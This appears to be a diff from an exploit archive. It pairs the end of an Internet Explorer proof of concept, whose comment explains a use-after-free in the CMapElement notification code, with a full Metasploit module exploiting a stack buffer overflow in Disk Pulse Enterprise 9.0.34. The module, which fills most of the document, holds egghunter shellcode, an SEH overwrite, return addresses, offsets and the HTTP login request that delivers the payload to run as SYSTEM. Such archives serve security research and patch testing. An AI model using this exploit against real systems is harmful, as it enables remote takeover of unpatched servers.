document.add­Event­Listener("readystatechange", on­Ready­State­Change­Callback, false);
// This work by Sky­Lined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
]]>
</script>
</html>
<!--
AFAICT, this event-within-an-event itself is the root cause of the bug and allows memory corruption in various ways. I discovered the issue because the code in CMap­Element::Notify does not handle this sequence of events well. The below pseudo-code represents that function and shows how this can lead to memory corruption:
void MSHTML!CMap­Element::Notify(CNotification* p­Notification) {
CElement::Notify(p­Arg1);
if (p­Notification->dw­Code_00 == 17) { // add
CMarkup* p­Markup = this->CElement::Get­Markup();
this->p­Next­Map­Element_38 = p­Markup->Get­Map­Head();
p­Markup->CMarkup::Set­Map­Head(this);
} else if (p­Notification->dw­Code_00 == 18) { // remove
CMarkup* p­Markup = this->CElement::Get­Markup();
CDoc p­Doc = p­Markup->CMarkup::Get­Lookaside­Ptr(4);
CMap­Element** pp­Map­Element = &(p­Doc->p­Map­Element_08);
while(*pp­Map­Element) {
if (*pp­Map­Element == this) {
*pp­Map­Element = this->p­Map­Element_38;
break;
}
pp­Map­Element = &(*pp­Map­Element->p­Map­Element_38);
}
}
}
This code maintains a singly linked list of map elements that have been added to the document. An object should never be added to this list twice, as this will cause a loop in the list (a map element pointing to itself as the next in the list). However, the event-within-an-event can be used to first cause two consecutive calls to remove the same element from this list followed by two calls to add the same element to the list. This results in the following sequence of events:
The first call to remove the element will remove it from the list.
The second call to remove the element will do nothing.
The first call to add the element will add it to the list.
The second call to add the element will try to add it to the list again, causing the list to contain a loop. This list is now corrupt.
At this point, an attacker can remove the CMap­Element, causing the code to try to remove it from the list and free it. However, because of the loop in the list, the above code will not actually remove it from the list. After this, the pointer in the list points to freed memory.
Exploit
I focused on the CMap­Element::Notify code and was able to reuse the freed memory originally used for the CMap­Element with another object of similar size (eg. a CParam­Element, which may be extra useful as it will store a pointer to its parent CObject­Element at offset 38). However, I could not think of a way to use the CMap­Element::Notify code to do anything useful at that point. I could also not immediately find any other code that uses this linked list, which is a bit odd: why would MSIE keep a linked list and not use it? I suspect there must be other code that uses it, and that this code may allow exploitation of this vulnerability.
Aside from the use-after-free bug that exists for CMap­Element objects above, there may be many other issues for other types of objects, as there are many different C<Elenent­Name>Element::Notify implementations for the various elements. It is assumes that none of these were designed to be reentrant. Unfortunately, I did not have time to exhaustively reverse engineer their code to look for other code paths that might be exploitable. As a result I am unable to prove exploitability beyond reasonable doubt.
Time-line
September 2014: This vulnerability was found through fuzzing.
September 2014: This vulnerability was submitted to ZDI.
September 2014: This vulnerability was acquired by ZDI.
February 2015: Microsoft address this issue in MS15-009.
November 2016: Details of this issue are released.
-->

120
platforms/windows/remote/40758.rb Executable file
View file

@ -0,0 +1,120 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Disk Pulse Enterprise
9.0.34. If a malicious user sends a malicious HTTP login request,
it is possible to execute a payload that would run under the Windows
NT AUTHORITY\SYSTEM account. Due to size constraints, this module
uses the Egghunter technique.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'Tulpa Security' # Original discovery -- @tulpa_security
],
'References' =>
[
[ 'EDB', '40452' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x26"
},
'Targets' =>
[
[ 'Disk Pulse Enterprise 9.0.34',
{
'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
'Offset' => 12600
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Oct 03 2016',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)], self.class)
end
def check
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.0\.34/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}
print_status("Generating exploit...")
sploit = "username=admin"
sploit << "&password=aaaaa\r\n"
# Would like to use generate_egghunter(), looking for improvement
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
sploit << rand_text(target['Offset'] - payload.encoded.length)
sploit << "w00tw00t"
sploit << payload.encoded
sploit << make_nops(70)
sploit << rand_text(1614)
# Would like to use generate_seh_record(), looking for improvement
sploit << "\x90\x90\xEB\x0B"
sploit << "\x33\xA3\x01\x10"
sploit << make_nops(20)
sploit << egghunter
sploit << make_nops(7000)
# Total exploit size should be 21747
print_status("Total exploit size: " + sploit.length.to_s)
print_status("Triggering the exploit now...")
print_status("Please be patient, the egghunter may take a while...")
res = send_request_cgi({
'uri' => '/login',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'content-length' => '17000',
'data' => sploit
})
handler
disconnect
end
end